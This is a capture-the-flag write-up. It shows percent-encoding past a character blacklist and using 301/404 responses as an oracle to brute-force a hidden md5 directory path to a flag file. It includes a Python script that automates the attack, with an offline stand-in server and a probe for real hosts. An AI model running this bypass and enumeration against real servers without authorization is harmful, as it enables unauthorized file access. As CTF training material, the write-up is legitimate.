Can you find a treasure?
Task: In this challenge, we had to find the flag using LFI.
Triage:
Findings from source code review:
- The server blacklists the characters f, l, a and g anywhere in the request path.
- The flag is stored in a nested directory structure: one directory per character of an md5 hash, ending in …/f/l/a/g/t/x/t, where the final t is the file containing the flag.
Approach:
I first attempt to bypass the character blacklist. After successfully bypassing the WAF, I look for a signal that tells an existing directory apart from a non-existing one. Using this signal I brute-force the path one character at a time to reach the flag.
Step #1: Bypass WAF
- To bypass the WAF, I try encoding the request for /alpaca (a file that exists on the server and contains the blacklisted characters a and l).
- I try URL encoding (a → %61 and l → %6C).
- <url>/%61%6Cp%61c%61 returns the file alpaca and bypasses the WAF: the filter only inspects the raw request path, while the server decodes the percent-escapes before resolving the file.
Step #2: Identifying the signal for an existing directory
- Upon accessing a non-existing directory:
- Status code = 404 (not found)
- Upon accessing an existing directory:
- Status code = 301 (redirect)
Step #3: Brute force the path to get the file:
- I used Burp Suite Intruder to brute-force the directory names.
- Since an md5 hex digest only contains the characters 0-9 and a-f, I added these 16 characters to the payload list. The blacklisted a and f have to be sent URL-encoded (%61 and %66), otherwise the WAF blocks those two payloads and the brute force silently skips them.
- At each depth, the single payload that returns status code 301 is the next character of the path; every other payload returns 404.
- Following is the bruteforced path discovered:
/4/b/%61/%66/b/1/9/%61/7/b/6/6/c/b/4/1/5/e/b/0/7/0/c/e/1/%61/1/b/2/e/8/%66/%66/%6C/%61/%67/./t/x/t - In the discovered path above, the characters f, l, a and g are URL-encoded as %66, %6C, %61 and %67; the 32 hex characters before the encoded flag directories are the md5 hash.
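The three steps above, automated, as an added example that is not part of the original write-up or the challenge code. It encodes the blacklisted characters in the payload list, grows the path one directory at a time on the 301/404 oracle, and then reads the flag under the recovered hash prefix. The server it talks to is a constructed stand-in (`fake_server`, built from md5("alpaca") and a made-up flag) so the script runs offline; `http_probe` is the hypothetical replacement for a real target and is not exercised here.

```python
"""Brute-forcing the hash directory behind a character blacklist.

Added example, not the challenge's own code.  Two observations from the
write-up drive it: the WAF rejects raw f, l, a, g (so those are sent
percent-encoded), and an existing directory answers 301 while a missing one
answers 404.  The server here is a constructed stand-in so the script runs
offline; http_probe is the only part that would talk to a real host.
"""
import hashlib
import http.client
import posixpath
from typing import Callable
from urllib.parse import unquote

BLACKLIST = set("flag")          # characters the WAF rejects in the raw path
HEX_DIGITS = "0123456789abcdef"  # alphabet of an MD5 hex digest
MD5_HEX_LEN = 32
# Tail of the flag path as discovered in the write-up, already encoded.
FLAG_SUFFIX = "/%66/%6C/%61/%67/./t/x/t"

Probe = Callable[[str], tuple[int, str]]  # raw path -> (status, body)


def encode_char(c: str) -> str:
    """Percent-encode a character only if the WAF would reject it in the clear."""
    return f"%{ord(c):02X}" if c in BLACKLIST else c


def hex_wordlist() -> list[str]:
    """Intruder-style payload list: 0-9 and b-e in the clear, a and f as %61/%66."""
    return [encode_char(c) for c in HEX_DIGITS]


def brute_force_hash_path(probe: Probe, depth: int = MD5_HEX_LEN) -> str:
    """Grow the path one directory at a time, keeping the candidate that gets a 301."""
    path = ""
    for position in range(depth):
        for candidate in hex_wordlist():
            status, _ = probe(f"{path}/{candidate}")
            if status == 301:
                path = f"{path}/{candidate}"
                break
        else:  # no candidate answered 301: the oracle or the encoding is broken
            raise RuntimeError(f"no existing directory found at depth {position}")
    return path


def recover_flag(probe: Probe) -> str:
    """Brute-force the hash prefix, then read the flag file under it."""
    hash_path = brute_force_hash_path(probe)
    status, body = probe(hash_path + FLAG_SUFFIX)
    if status != 200:
        raise RuntimeError(f"flag file not readable: HTTP {status}")
    return body


def http_probe(host: str, port: int = 80) -> Probe:
    """Hypothetical real probe: http.client does not follow redirects, so 301 stays visible."""
    def probe(raw_path: str) -> tuple[int, str]:
        conn = http.client.HTTPConnection(host, port, timeout=10)
        conn.request("GET", raw_path)
        resp = conn.getresponse()
        body = resp.read().decode(errors="replace")
        conn.close()
        return resp.status, body
    return probe


def fake_server(md5_hex: str, flag: str) -> Probe:
    """Constructed stand-in for the challenge server, modelling the write-up's findings."""
    parts = list(md5_hex) + list("flag") + ["t", "x"]  # one character per directory
    dirs = {"/" + "/".join(parts[:i]) for i in range(1, len(parts) + 1)}
    file_path = "/" + "/".join(parts + ["t"])

    def probe(raw_path: str) -> tuple[int, str]:
        if BLACKLIST & set(raw_path):  # the WAF inspects the raw request path only
            return 403, "blocked"
        # decode, then normalise as a web server would ("/./" disappears)
        target = posixpath.normpath(unquote(raw_path))
        if target == file_path:
            return 200, flag
        if target in dirs:
            return 301, ""
        return 404, ""
    return probe


# Constructed sample: the directory tree is derived from md5("alpaca").
SAMPLE_HASH = hashlib.md5(b"alpaca").hexdigest()
SAMPLE_FLAG = "Alpaca{constructed_sample_flag}"

if __name__ == "__main__":
    server = fake_server(SAMPLE_HASH, SAMPLE_FLAG)
    print(brute_force_hash_path(server))
    print(recover_flag(server))
```

Against a real target, swap `fake_server(...)` for `http_probe(host)`; the rest is unchanged. The wordlist loop costs at most 16 requests per character, so the 32-character hash takes at most 512 requests plus one for the flag, which is why the 301/404 distinction matters: without a per-directory oracle the search space would be 16^32.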
Alpaca{alpaca***************tan}
